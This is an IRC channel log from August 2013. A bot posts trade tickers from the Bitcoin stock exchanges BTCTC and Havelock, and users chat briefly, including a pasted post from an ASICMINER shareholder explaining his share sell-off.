[BTCTC] [TAT.ASICMINER] 10 @ 0.02829 = 0.2829 BTC [+] Aug 22 04:13:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.02849 BTC [+] Aug 22 04:13:37 [BTCTC] [TAT.ASICMINER] 57 @ 0.02849 = 1.6239 BTC [+] Aug 22 04:13:39 [BTCTC] [TAT.ASICMINER] 121 @ 0.0285 = 3.4485 BTC [+] Aug 22 04:14:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.0285 = 0.057 BTC [+] Aug 22 04:14:44 [BTCTC] [TAT.ASICMINER] 67 @ 0.02849 = 1.9088 BTC [-] Aug 22 04:14:47 [BTCTC] [TAT.ASICMINER] 63 @ 0.0285 = 1.7955 BTC [+] Aug 22 04:14:52 [BTCTC] [ACTIVEMINING] 3 @ 0.005449 = 0.0163 BTC [+] Aug 22 04:15:48 [BTCTC] [ACTIVEMINING] 243 @ 0.005449 = 1.3241 BTC [+] Aug 22 04:15:49 [BTCTC] [ACTIVEMINING] 1318 @ 0.00545 = 7.1831 BTC [+] Aug 22 04:16:31 [BTCTC] [ASICMINER-PT] 1 @ 3.044 BTC [+] Aug 22 04:16:57 if this shit was going on at wall street the SEC would have shut down the entire downtown manhattan by now Aug 22 04:17:09 how do you figure ? stocks move all the time. Aug 22 04:17:50 i dunno.. Aug 22 04:18:03 i like the wild west-like action Aug 22 04:18:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.02849 BTC [-] Aug 22 04:18:18 [BTCTC] [TAT.ASICMINER] 118 @ 0.0285 = 3.363 BTC [+] Aug 22 04:18:32 [BTCTC] [ACTIVEMINING] 63 @ 0.005448 = 0.3432 BTC [-] Aug 22 04:18:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005448 = 0.1634 BTC [-] Aug 22 04:18:42 [BTCTC] [TAT.ASICMINER] 6 @ 0.0285 = 0.171 BTC [+] Aug 22 04:18:46 [BTCTC] [TAT.ASICMINER] 80 @ 0.0285 = 2.28 BTC [+] Aug 22 04:18:49 but there are millions of dollars moving around based on one forum board with anonymous posters Aug 22 04:18:57 Activemining at 0.005448??? Aug 22 04:18:59 Its fucking awesome Aug 22 04:19:20 [BTCTC] [TAT.ASICMINER] 110 @ 0.0285 = 3.135 BTC [+] Aug 22 04:19:21 [BTCTC] [ACTIVEMINING] 30 @ 0.005448 = 0.1634 BTC [-] Aug 22 04:19:23 [BTCTC] [ACTIVEMINING] 37 @ 0.005495 = 0.2033 BTC [+] Aug 22 04:19:24 [BTCTC] [TAT.ASICMINER] 50 @ 0.0285 = 1.425 BTC [+] Aug 22 04:19:25 [BTCTC] [ACTIVEMINING] 50 @ 0.005498 = 0.2749 BTC [+] Aug 22 04:19:26 [BTCTC] [ACTIVEMINING] 470 @ 0.0055 = 2.585 BTC [+] Aug 22 04:19:48 [HAVELOCK] [AM1] 1 @ 2.9 BTC [+] Aug 22 04:20:17 [BTCTC] [ACTIVEMINING] 30 @ 0.005499 = 0.165 BTC [-] Aug 22 04:20:19 [BTCTC] [BASIC-MINING] 3 @ 0.2643 = 0.7929 BTC [+] Aug 22 04:20:20 [BTCTC] [LABCOIN] 8 @ 0.002275 = 0.0182 BTC [-] Aug 22 04:20:22 [BTCTC] [ACTIVEMINING] 30 @ 0.0055 = 0.165 BTC [+] Aug 22 04:20:23 [BTCTC] [BASIC-MINING] 15 @ 0.2644 = 3.966 BTC [+] Aug 22 04:20:24 [BTCTC] [ACTIVEMINING] 60 @ 0.005542 = 0.3325 BTC [+] Aug 22 04:20:26 [BTCTC] [BASIC-MINING] 1 @ 0.2657 BTC [+] Aug 22 04:20:27 [BTCTC] [BASIC-MINING] 3 @ 0.2719 = 0.8157 BTC [+] Aug 22 04:20:28 [BTCTC] [BASIC-MINING] 17 @ 0.272 = 4.624 BTC [+] Aug 22 04:20:28 [BTCTC] [BASIC-MINING] 1 @ 0.2774 BTC [+] Aug 22 04:20:29 [BTCTC] [BASIC-MINING] 7 @ 0.2775 = 1.9425 BTC [+] Aug 22 04:21:44 [BTCTC] [ASICMINER-PT] 1 @ 2.893 BTC [-] Aug 22 04:22:31 [HAVELOCK] [XBOND] 27 @ 0.00114 = 0.0308 BTC [-] Aug 22 04:23:09 [HAVELOCK] [XBOND] 2 @ 0.00114 = 0.0023 BTC [-] Aug 22 04:23:12 [BTCTC] [ASICMINER-PT] 1 @ 2.892 BTC [-] Aug 22 04:23:16 [BTCTC] [ACTIVEMINING] 50 @ 0.005497 = 0.2749 BTC [-] Aug 22 04:23:18 [BTCTC] [ACTIVEMINING] 415 @ 0.00554 = 2.2991 BTC [+] Aug 22 04:23:19 [BTCTC] [ACTIVEMINING] 140 @ 0.005542 = 0.7759 BTC [+] Aug 22 04:23:20 [BTCTC] [ACTIVEMINING] 395 @ 0.00555 = 2.1923 BTC [+] Aug 22 04:23:20 [BTCTC] [TAT.ASICMINER] 7 @ 0.02885 = 0.202 BTC [+] Aug 22 04:24:01 [HAVELOCK] [XBOND] 1 @ 0.00114 BTC [-] Aug 22 04:24:49 [BTCTC] [TAT.ASICMINER] 6 @ 0.02888 = 0.1733 BTC [+] Aug 22 04:24:51 [BTCTC] [TAT.ASICMINER] 130 @ 0.02889 = 3.7557 BTC [+] Aug 22 04:24:55 ASICMINER-PT divs 0.01226019 Aug 22 04:24:57 [BTCTC] [TAT.ASICMINER] 67 @ 0.02889 = 1.9356 BTC [+] Aug 22 04:24:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02889 BTC [+] Aug 22 04:25:16 [BTCTC] [TAT.ASICMINER] 45 @ 0.02889 = 1.3001 BTC [+] Aug 22 04:25:44 [BTCTC] [TAT.ASICMINER] 28 @ 0.02889 = 0.8089 BTC [+] Aug 22 04:25:45 [BTCTC] [TAT.ASICMINER] 11 @ 0.02889 = 0.3178 BTC [+] Aug 22 04:26:43 [BTCTC] [TAT.ASICMINER] 103 @ 0.02889 = 2.9757 BTC [+] Aug 22 04:27:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.0289 = 0.0578 BTC [+] Aug 22 04:27:34 [BTCTC] [ASICMINER-PT] 1 @ 2.891 BTC [-] Aug 22 04:27:39 [BTCTC] [ASICMINER-PT] 1 @ 3.003 BTC [+] Aug 22 04:27:56 [BTCTC] [ASICMINER-PT] 1 @ 3.004 BTC [+] Aug 22 04:28:39 [BTCTC] [ASICMINER-PT] 2 @ 2.89 = 5.78 BTC [-] Aug 22 04:29:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0289 BTC [+] Aug 22 04:29:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.0289 = 0.1445 BTC [+] Aug 22 04:29:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.0289 = 0.1156 BTC [+] Aug 22 04:29:51 [HAVELOCK] [AM100] 2 @ 0.02767777 = 0.0554 BTC [-] Aug 22 04:31:25 [BTCTC] [TAT.ASICMINER] 488 @ 0.0289 = 14.1032 BTC [+] Aug 22 04:31:59 [BTCTC] [TAT.ASICMINER] 200 @ 0.0295 = 5.9 BTC [+] Aug 22 04:32:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0295 BTC [+] Aug 22 04:32:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.02949 = 0.059 BTC [-] Aug 22 04:32:31 [BTCTC] [ASICMINER-PT] 1 @ 2.985 BTC [+] Aug 22 04:33:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.02999 BTC [+] Aug 22 04:33:12 [BTCTC] [ASICMINER-PT] 1 @ 2.985 BTC [+] Aug 22 04:33:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.02999 = 0.06 BTC [+] Aug 22 04:33:48 [BTCTC] [ASICMINER-PT] 1 @ 2.984 BTC [-] Aug 22 04:34:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.02999 = 0.15 BTC [+] Aug 22 04:35:49 [BTCTC] [TAT.ASICMINER] 28 @ 0.02999 = 0.8397 BTC [+] Aug 22 04:35:50 [BTCTC] [ASICMINER-PT] 3 @ 2.951 = 8.853 BTC [-] Aug 22 04:35:54 [BTCTC] [TAT.ASICMINER] 31 @ 0.02999 = 0.9297 BTC [+] Aug 22 04:35:55 [BTCTC] [LABCOIN] 30 @ 0.002242 = 0.0673 BTC [-] Aug 22 04:35:57 [BTCTC] [LABCOIN] 85 @ 0.002241 = 0.1905 BTC [-] Aug 22 04:35:58 [BTCTC] [LABCOIN] 385 @ 0.00224 = 0.8624 BTC [-] Aug 22 04:36:27 [BTCTC] [ASICMINER-PT] 1 @ 2.989 BTC [+] Aug 22 04:36:27 [BTCTC] [ASICMINER-PT] 6 @ 2.99 = 17.94 BTC [+] Aug 22 04:36:53 [BTCTC] [TAT.ASICMINER] 35 @ 0.02999 = 1.0497 BTC [+] Aug 22 04:38:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.02999 BTC [+] Aug 22 04:39:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.02999 = 0.06 BTC [+] Aug 22 04:40:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.02999 = 0.06 BTC [+] Aug 22 04:40:38 [BTCTC] [ACTIVEMINING] 30 @ 0.005345 = 0.1604 BTC [-] Aug 22 04:40:40 [BTCTC] [ACTIVEMINING] 68 @ 0.005344 = 0.3634 BTC [-] Aug 22 04:40:41 [BTCTC] [ACTIVEMINING] 10 @ 0.005331 = 0.0533 BTC [-] Aug 22 04:40:42 [BTCTC] [ACTIVEMINING] 50 @ 0.00533 = 0.2665 BTC [-] Aug 22 04:40:43 [BTCTC] [ACTIVEMINING] 35 @ 0.005251 = 0.1838 BTC [-] Aug 22 04:40:44 [BTCTC] [ACTIVEMINING] 175 @ 0.00525 = 0.9188 BTC [-] Aug 22 04:40:45 [BTCTC] [ACTIVEMINING] 83 @ 0.005201 = 0.4317 BTC [-] Aug 22 04:40:46 [BTCTC] [ACTIVEMINING] 419 @ 0.0052 = 2.1788 BTC [-] Aug 22 04:40:47 [BTCTC] [ACTIVEMINING] 499 @ 0.005163 = 2.5763 BTC [-] Aug 22 04:40:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.02999 = 0.09 BTC [+] Aug 22 04:42:07 [BTCTC] [ASICMINER-PT] 1 @ 2.989 BTC [-] Aug 22 04:42:09 [BTCTC] [ASICMINER-PT] 1 @ 2.99 BTC [+] Aug 22 04:43:21 [BTCTC] [TAT.ASICMINER] 24 @ 0.02999 = 0.7198 BTC [+] Aug 22 04:43:59 [BTCTC] [TAT.ASICMINER] 14 @ 0.03 = 0.42 BTC [+] Aug 22 04:44:56 [BTCTC] [ASICMINER-PT] 3 @ 2.99 = 8.97 BTC [+] Aug 22 04:45:12 [BTCTC] [TAT.ASICMINER] 37 @ 0.03 = 1.11 BTC [+] Aug 22 04:46:16 [BTCTC] [TAT.ASICMINER] 122 @ 0.03 = 3.66 BTC [+] Aug 22 04:47:11 [BTCTC] [TAT.ASICMINER] 27 @ 0.03047 = 0.8227 BTC [+] Aug 22 04:49:29 [BTCTC] [LABCOIN] 30 @ 0.002267 = 0.068 BTC [+] Aug 22 04:50:20 [BTCTC] [LABCOIN] 145 @ 0.002267 = 0.3287 BTC [+] Aug 22 04:50:45 [BTCTC] [ACTIVEMINING] 30 @ 0.005198 = 0.1559 BTC [+] Aug 22 04:50:46 [BTCTC] [ACTIVEMINING] 68 @ 0.005197 = 0.3534 BTC [-] Aug 22 04:50:48 [BTCTC] [ACTIVEMINING] 2 @ 0.005195 = 0.0104 BTC [-] Aug 22 04:51:32 [BTCTC] [TAT.ASICMINER] 17 @ 0.03047 = 0.518 BTC [+] Aug 22 04:51:37 [HAVELOCK] [XBOND] 2 @ 0.00112 = 0.0022 BTC [-] Aug 22 04:54:37 [HAVELOCK] [AM100] 8 @ 0.0277 = 0.2216 BTC [+] Aug 22 04:54:40 [HAVELOCK] [AM100] 10 @ 0.028 = 0.28 BTC [+] Aug 22 04:54:42 [HAVELOCK] [AM100] 2 @ 0.02988 = 0.0598 BTC [+] Aug 22 04:54:43 [HAVELOCK] [AM100] 8 @ 0.02989 = 0.2391 BTC [+] Aug 22 04:54:45 [HAVELOCK] [AM100] 22 @ 0.029899 = 0.6578 BTC [+] Aug 22 04:54:55 [HAVELOCK] [AM100] 5 @ 0.029899 = 0.1495 BTC [+] Aug 22 04:55:11 [HAVELOCK] [AM100] 2 @ 0.029899 = 0.0598 BTC [+] Aug 22 04:57:18 HI! Aug 22 04:57:41 [BTCTC] [ASICMINER-PT] 1 @ 3.009 BTC [+] Aug 22 04:58:24 [BTCTC] [ASICMINER-PT] 1 @ 3.031 BTC [+] Aug 22 05:00:04 [BTCTC] [ASICMINER-PT] 1 @ 3.007 BTC [-] Aug 22 05:00:43 [BTCTC] [ASICMINER-PT] 1 @ 3.035 BTC [+] Aug 22 05:00:45 [BTCTC] [TAT.ASICMINER] 23 @ 0.03047 = 0.7008 BTC [+] Aug 22 05:00:57 [BTCTC] [LABCOIN] 20 @ 0.002268 = 0.0454 BTC [+] Aug 22 05:00:59 [BTCTC] [LABCOIN] 825 @ 0.002267 = 1.8703 BTC [-] Aug 22 05:02:15 [HAVELOCK] [XBOND] 350 @ 0.001125 = 0.3938 BTC [+] Aug 22 05:02:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.03048 BTC [+] Aug 22 05:03:11 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [-] Aug 22 05:03:52 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Aug 22 05:04:28 [HAVELOCK] [AM100] 13 @ 0.029899 = 0.3887 BTC [+] Aug 22 05:04:31 [HAVELOCK] [XBOND] 3 @ 0.001125 = 0.0034 BTC [+] Aug 22 05:04:33 [BTCTC] [LABCOIN] 30 @ 0.002278 = 0.0683 BTC [+] Aug 22 05:04:34 [BTCTC] [LABCOIN] 5 @ 0.002279 = 0.0114 BTC [+] Aug 22 05:04:35 [BTCTC] [LABCOIN] 20 @ 0.002281 = 0.0456 BTC [+] Aug 22 05:05:02 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [-] Aug 22 05:05:28 [BTCTC] [ACTIVEMINING] 68 @ 0.005249 = 0.3569 BTC [+] Aug 22 05:05:30 [BTCTC] [ACTIVEMINING] 46 @ 0.005247 = 0.2414 BTC [-] Aug 22 05:05:30 [BTCTC] [ACTIVEMINING] 6 @ 0.005246 = 0.0315 BTC [-] Aug 22 05:05:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005245 = 0.1574 BTC [-] Aug 22 05:06:12 [BTCTC] [ASICMINER-PT] 1 @ 3.021 BTC [+] Aug 22 05:06:26 [BTCTC] [ACTIVEMINING] 15 @ 0.005152 = 0.0773 BTC [-] Aug 22 05:06:27 [BTCTC] [ACTIVEMINING] 30 @ 0.005151 = 0.1545 BTC [-] Aug 22 05:06:29 [BTCTC] [ACTIVEMINING] 185 @ 0.005142 = 0.9513 BTC [-] Aug 22 05:07:24 [BTCTC] [TAT.ASICMINER] 67 @ 0.03048 = 2.0422 BTC [+] Aug 22 05:07:55 [BTCTC] [TAT.ASICMINER] 307 @ 0.03049 = 9.3604 BTC [+] Aug 22 05:07:58 [BTCTC] [ASICMINER-PT] 1 @ 3.01 BTC [-] Aug 22 05:08:23 [BTCTC] [ASICMINER-PT] 3 @ 3.01 = 9.03 BTC [-] Aug 22 05:09:12 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [-] Aug 22 05:09:48 [BTCTC] [ASICMINER-PT] 1 @ 3.033 BTC [+] **** BEGIN LOGGING AT Thu Aug 22 13:26:03 2013 Aug 22 13:26:47 [BTCTC] [LABCOIN] 2 @ 0.002165 = 0.0043 BTC [-] Aug 22 13:26:48 [BTCTC] [LABCOIN] 20 @ 0.002164 = 0.0433 BTC [-] Aug 22 13:26:49 [BTCTC] [LABCOIN] 4 @ 0.00216 = 0.0086 BTC [-] Aug 22 13:26:50 [BTCTC] [LABCOIN] 137 @ 0.002156 = 0.2954 BTC [-] Aug 22 13:26:51 [BTCTC] [LABCOIN] 600 @ 0.002155 = 1.293 BTC [-] Aug 22 13:26:53 [BTCTC] [LABCOIN] 500 @ 0.002154 = 1.077 BTC [-] Aug 22 13:26:54 [BTCTC] [LABCOIN] 25 @ 0.002151 = 0.0538 BTC [-] Aug 22 13:26:55 [BTCTC] [LABCOIN] 1 @ 0.00215 BTC [-] Aug 22 13:26:56 [BTCTC] [LABCOIN] 111 @ 0.00215 = 0.2387 BTC [-] Aug 22 13:28:07 [BTCTC] [DMS.MINING] 1 @ 0.00331 BTC [+] Aug 22 13:29:02 [BTCTC] [ASICMINER-PT] 1 @ 3.11 BTC [+] Aug 22 13:29:19 [BTCTC] [DMS.MINING] 99 @ 0.00331 = 0.3277 BTC [+] Aug 22 13:29:29 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001479 = 0.003 BTC [+] Aug 22 13:32:42 [BTCTC] [DMS.MINING] 30 @ 0.00332 = 0.0996 BTC [+] Aug 22 13:33:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.0311 = 0.1555 BTC [-] Aug 22 13:33:29 [BTCTC] [TAT.ASICMINER] 30 @ 0.0311 = 0.933 BTC [-] Aug 22 13:37:02 [HAVELOCK] [AM100] 10 @ 0.02975 = 0.2975 BTC [-] Aug 22 13:38:05 [HAVELOCK] [AM100] 31 @ 0.02979 = 0.9235 BTC [+] Aug 22 13:39:55 [HAVELOCK] [SDSTM] 4 @ 0.00559 = 0.0224 BTC [+] Aug 22 13:40:32 [HAVELOCK] [SDSTM] 36 @ 0.0056 = 0.2016 BTC [+] Aug 22 13:40:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.03178 = 0.1271 BTC [+] Aug 22 13:45:02 [BTCTC] [LABCOIN] 2 @ 0.002258 = 0.0045 BTC [+] Aug 22 13:45:03 [BTCTC] [LABCOIN] 20 @ 0.002259 = 0.0452 BTC [+] Aug 22 13:45:04 [BTCTC] [LABCOIN] 167 @ 0.002266 = 0.3784 BTC [+] Aug 22 13:45:05 [BTCTC] [LABCOIN] 821 @ 0.002267 = 1.8612 BTC [+] Aug 22 13:49:23 [BTCTC] [LABCOIN] 20 @ 0.002154 = 0.0431 BTC [-] Aug 22 13:49:25 [BTCTC] [LABCOIN] 2 @ 0.002153 = 0.0043 BTC [-] Aug 22 13:49:26 [BTCTC] [LABCOIN] 11 @ 0.002151 = 0.0237 BTC [-] Aug 22 13:49:26 [BTCTC] [LABCOIN] 89 @ 0.00215 = 0.1914 BTC [-] Aug 22 13:49:27 [BTCTC] [LABCOIN] 4 @ 0.002143 = 0.0086 BTC [-] Aug 22 13:49:29 [BTCTC] [LABCOIN] 37 @ 0.002142 = 0.0793 BTC [-] Aug 22 13:49:30 [BTCTC] [LABCOIN] 110 @ 0.002141 = 0.2355 BTC [-] Aug 22 13:49:31 [BTCTC] [LABCOIN] 880 @ 0.00214 = 1.8832 BTC [-] Aug 22 13:49:32 [BTCTC] [LABCOIN] 5 @ 0.00214 = 0.0107 BTC [-] Aug 22 13:49:33 [BTCTC] [LABCOIN] 157 @ 0.002137 = 0.3355 BTC [-] Aug 22 13:49:34 [BTCTC] [LABCOIN] 506 @ 0.002136 = 1.0808 BTC [-] Aug 22 13:49:35 [BTCTC] [LABCOIN] 200 @ 0.002135 = 0.427 BTC [-] Aug 22 13:49:36 [BTCTC] [LABCOIN] 550 @ 0.002135 = 1.1743 BTC [-] Aug 22 13:49:36 [BTCTC] [LABCOIN] 1375 @ 0.002134 = 2.9343 BTC [-] Aug 22 13:49:38 [BTCTC] [LABCOIN] 77 @ 0.002133 = 0.1642 BTC [-] Aug 22 13:50:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.03177 BTC [-] Aug 22 13:52:49 [BTCTC] [ASICMINER-PT] 1 @ 3.11 BTC [+] Aug 22 13:54:18 [BTCTC] [ASICMINER-PT] 1 @ 3.116 BTC [+] Aug 22 13:54:19 [BTCTC] [ASICMINER-PT] 1 @ 3.129 BTC [+] Aug 22 13:54:21 [BTCTC] [ASICMINER-PT] 1 @ 3.13 BTC [+] Aug 22 13:54:22 [BTCTC] [ASICMINER-PT] 1 @ 3.131 BTC [+] Aug 22 13:55:41 [BTCTC] [ASICMINER-PT] 1 @ 3.132 BTC [+] Aug 22 13:55:42 [BTCTC] [ASICMINER-PT] 3 @ 3.134 = 9.402 BTC [+] Aug 22 13:56:10 [BTCTC] [DMS.MINING] 50 @ 0.003328 = 0.1664 BTC [+] Aug 22 13:56:23 [BTCTC] [DMS.PURCHASE] 3 @ 0.02061 = 0.0618 BTC [+] Aug 22 13:56:44 [BTCTC] [DMS.MINING] 100 @ 0.003328 = 0.3328 BTC [+] Aug 22 13:56:57 [BTCTC] [LABCOIN] 1 @ 0.002218 BTC [+] Aug 22 13:56:59 [BTCTC] [LABCOIN] 20 @ 0.002219 = 0.0444 BTC [+] Aug 22 13:57:33 [BTCTC] [COGNITIVE] 1 @ 0.2885 BTC [-] Aug 22 13:57:42 [BTCTC] [DMS.MINING] 41 @ 0.003328 = 0.1364 BTC [+] Aug 22 13:57:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.03176 = 0.0635 BTC [-] Aug 22 13:58:08 [BTCTC] [LABCOIN] 64 @ 0.002266 = 0.145 BTC [+] Aug 22 13:58:48 [BTCTC] [LABCOIN] 517 @ 0.002267 = 1.172 BTC [+] Aug 22 13:59:03 [BTCTC] [DMS.MINING] 90 @ 0.003328 = 0.2995 BTC [+] Aug 22 14:00:24 [BTCTC] [LABCOIN] 2216 @ 0.002268 = 5.0259 BTC [+] Aug 22 14:03:04 [BTCTC] [LABCOIN] 380 @ 0.002269 = 0.8622 BTC [+] Aug 22 14:03:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.03176 = 0.0953 BTC [-] Aug 22 14:05:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.03186 = 0.3186 BTC [+] Aug 22 14:09:49 [BTCTC] [DMS.MINING] 169 @ 0.003328 = 0.5624 BTC [+] Aug 22 14:11:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.03186 = 0.1274 BTC [+] Aug 22 14:15:13 [BTCTC] [LABCOIN] 2 @ 0.002142 = 0.0043 BTC [-] Aug 22 14:15:58 [BTCTC] [DMS.PURCHASE] 1 @ 0.02061 BTC [+] Aug 22 14:16:14 [BTCTC] [LABCOIN] 2 @ 0.002142 = 0.0043 BTC [-] Aug 22 14:16:16 [BTCTC] [LABCOIN] 20 @ 0.002141 = 0.0428 BTC [-] Aug 22 14:16:17 [BTCTC] [LABCOIN] 625 @ 0.002138 = 1.3363 BTC [-] Aug 22 14:16:18 [BTCTC] [LABCOIN] 5000 @ 0.002137 = 10.685 BTC [-] Aug 22 14:16:19 [BTCTC] [LABCOIN] 11 @ 0.002136 = 0.0235 BTC [-] Aug 22 14:16:21 [BTCTC] [LABCOIN] 90 @ 0.002135 = 0.1922 BTC [-] Aug 22 14:16:22 [BTCTC] [LABCOIN] 1365 @ 0.002134 = 2.9129 BTC [-] Aug 22 14:16:23 [BTCTC] [LABCOIN] 923 @ 0.002133 = 1.9688 BTC [-] Aug 22 14:16:24 [BTCTC] [LABCOIN] 5261 @ 0.002133 = 11.2217 BTC [-] Aug 22 14:16:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.03186 = 0.0637 BTC [+] Aug 22 14:16:52 [BTCTC] [ASICMINER-PT] 1 @ 3.129 BTC [-] Aug 22 14:17:54 [BTCTC] [DMS.SELLING] 1 @ 0.01739 BTC [-] Aug 22 14:20:52 [BTCTC] [ACTIVEMINING] 10 @ 0.005396 = 0.054 BTC [+] Aug 22 14:21:29 [BTCTC] [ACTIVEMINING] 50 @ 0.005397 = 0.2699 BTC [+] Aug 22 14:21:30 [BTCTC] [ACTIVEMINING] 13 @ 0.005412 = 0.0704 BTC [+] Aug 22 14:21:31 [BTCTC] [ACTIVEMINING] 68 @ 0.005413 = 0.3681 BTC [+] Aug 22 14:21:32 [BTCTC] [ACTIVEMINING] 174 @ 0.005432 = 0.9452 BTC [+] Aug 22 14:22:06 [BTCTC] [LABCOIN] 12 @ 0.002264 = 0.0272 BTC [+] Aug 22 14:28:12 [HAVELOCK] [AM100] 13 @ 0.02979 = 0.3873 BTC [+] Aug 22 14:29:08 [HAVELOCK] [XBOND] 22 @ 0.00114499 = 0.0252 BTC [+] Aug 22 14:31:29 [BTCTC] [TAT.ASICMINER] 27 @ 0.03186 = 0.8602 BTC [+] Aug 22 14:32:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.03186 BTC [+] Aug 22 14:38:11 [HAVELOCK] [AM100] 194 @ 0.02979 = 5.7793 BTC [+] Aug 22 14:42:42 [BTCTC] [DMS.PURCHASE] 164 @ 0.02061 = 3.38 BTC [+] Aug 22 14:44:10 [BTCTC] [LABCOIN] 2 @ 0.002258 = 0.0045 BTC [-] Aug 22 14:45:38 [BTCTC] [LABCOIN] 20 @ 0.002259 = 0.0452 BTC [+] Aug 22 14:45:59 [BTCTC] [DMS.MINING] 2 @ 0.0034 = 0.0068 BTC [+] Aug 22 14:46:35 [BTCTC] [TAT.ASICMINER] 23 @ 0.03186 = 0.7328 BTC [+] Aug 22 14:46:49 [BTCTC] [LABCOIN] 48 @ 0.002264 = 0.1087 BTC [+] Aug 22 14:47:14 [BTCTC] [TAT.ASICMINER] 30 @ 0.03188 = 0.9564 BTC [+] Aug 22 14:47:25 [BTCTC] [LABCOIN] 4 @ 0.002265 = 0.0091 BTC [+] Aug 22 14:47:39 [BTCTC] [LABCOIN] 130 @ 0.002265 = 0.2945 BTC [+] Aug 22 14:51:00 [BTCTC] [TAT.ASICMINER] 35 @ 0.03188 = 1.1158 BTC [+] Aug 22 14:51:14 [BTCTC] [DMS.MINING] 31 @ 0.003328 = 0.1032 BTC [-] Aug 22 14:51:15 [BTCTC] [DMS.MINING] 70 @ 0.00332 = 0.2324 BTC [-] Aug 22 14:51:17 [BTCTC] [DMS.MINING] 1 @ 0.00331 BTC [-] Aug 22 14:51:18 [BTCTC] [DMS.MINING] 62 @ 0.0033 = 0.2046 BTC [-] Aug 22 14:52:14 [BTCTC] [TAT.MINIGAME] 5 @ 0.0002427 = 0.0012 BTC [-] Aug 22 14:54:11 [BTCTC] [DMS.MINING] 35 @ 0.0034 = 0.119 BTC [+] Aug 22 14:54:13 [BTCTC] [DMS.MINING] 3 @ 0.0034 = 0.0102 BTC [+] Aug 22 14:54:33 [BTCTC] [DMS.MINING] 5 @ 0.003468 = 0.0173 BTC [+] Aug 22 14:55:42 [BTCTC] [DMS.PURCHASE] 26 @ 0.02061 = 0.5359 BTC [+] Aug 22 14:56:03 [BTCTC] [DMS.MINING] 95 @ 0.003468 = 0.3295 BTC [+] Aug 22 14:56:20 [BTCTC] [DMS.MINING] 62 @ 0.0034 = 0.2108 BTC [-] Aug 22 14:57:09 [BTCTC] [LABCOIN] 5 @ 0.002263 = 0.0113 BTC [-] Aug 22 15:00:56 [BTCTC] [DMS.MINING] 5 @ 0.00331 = 0.0166 BTC [-] Aug 22 15:00:57 [BTCTC] [DMS.MINING] 21 @ 0.0033 = 0.0693 BTC [-] Aug 22 15:05:42 [BTCTC] [TAT.ASICMINER] 17 @ 0.03188 = 0.542 BTC [+] Aug 22 15:06:27 [BTCTC] [DMS.MINING] 7 @ 0.003399 = 0.0238 BTC [+] Aug 22 15:08:52 [BTCTC] [ASICMINER-PT] 1 @ 3.124 BTC [-] Aug 22 15:09:45 RE: AM Sell off: Hi, I'm the whale. Aug 22 15:09:45 No, I'm not a board member and I haven't been since April. Aug 22 15:09:45 I was kind of concerned about having board membership earlier this year because if I did want to liquidate I didn't want to have some sort of insider trading bullshit pinned on me. Also I panic sold enough shares to lose board membership and regretted it later on. Aug 22 15:09:45 Why was I liquidating? Aug 22 15:09:46 I wanted to prepare my bitcoins for the massive BTCUSD bubble which is coming pretty soon and started getting anxious when ASICMINER shares were slowly dropping Dividend sucked and I expected gigantic panic sells so I threw all my shares out there. Aug 22 15:09:47 [BTCTC] [BTC-GROWTH] 2 @ 0.0998 = 0.1996 BTC [+] Aug 22 15:09:52 Why did I stop liquidating (for now)? Aug 22 15:09:54 Someone who I think has a pretty informed position in ASICMINER bought a lot of shares from me and so, screw it, if I'm going to lose 25% in a day I might as well stick it out with this guy Then I started getting a ton of PMs for buying shares at market price and realized I might want to wait before I sell too many more, as I was selling some shares way too low. All my offers were being filled by Aug 22 15:09:59 big players, which is usually when you know you're making shitty trades. friedcat has more things to announce, it's not like they planned ~6 months worth of stuff for nothing. Aug 22 15:10:02 I'm not done selling obviously but I'm definitely done panicking. Aug 22 15:10:06 Called it. Aug 22 15:10:08 sourcE: http://www.reddit.com/r/BitcoinStocks/comments/1kuss0/the_am_whale_tells_all/ Aug 22 15:10:12 https://bitcointalk.org/index.php?topic=99497.msg2984315#msg2984315 Aug 22 15:10:19 ASICMINER: Entering the Future of ASIC Mining by Inventing It Aug 22 15:10:26 [BTCTC] [BTC-GROWTH] 1 @ 0.0998 BTC [+] Aug 22 15:12:37 [HAVELOCK] [AM100] 1 @ 0.0299 BTC [+] Aug 22 15:15:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.03188 BTC [+] Aug 22 15:16:27 my bad Aug 22 15:17:01 [BTCTC] [TAT.ASICMINER] 35 @ 0.03188 = 1.1158 BTC [+] Aug 22 15:19:21 [BTCTC] [DMS.MINING] 132 @ 0.003399 = 0.4487 BTC [+] Aug 22 15:19:48 [HAVELOCK] [LABCO] 3 @ 0.00226 = 0.0068 BTC [+] Aug 22 15:20:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.03188 = 0.1275 BTC [+] Aug 22 15:25:10 [HAVELOCK] [AM1] 1 @ 3.17999999 BTC [+] Aug 22 15:25:33 [HAVELOCK] 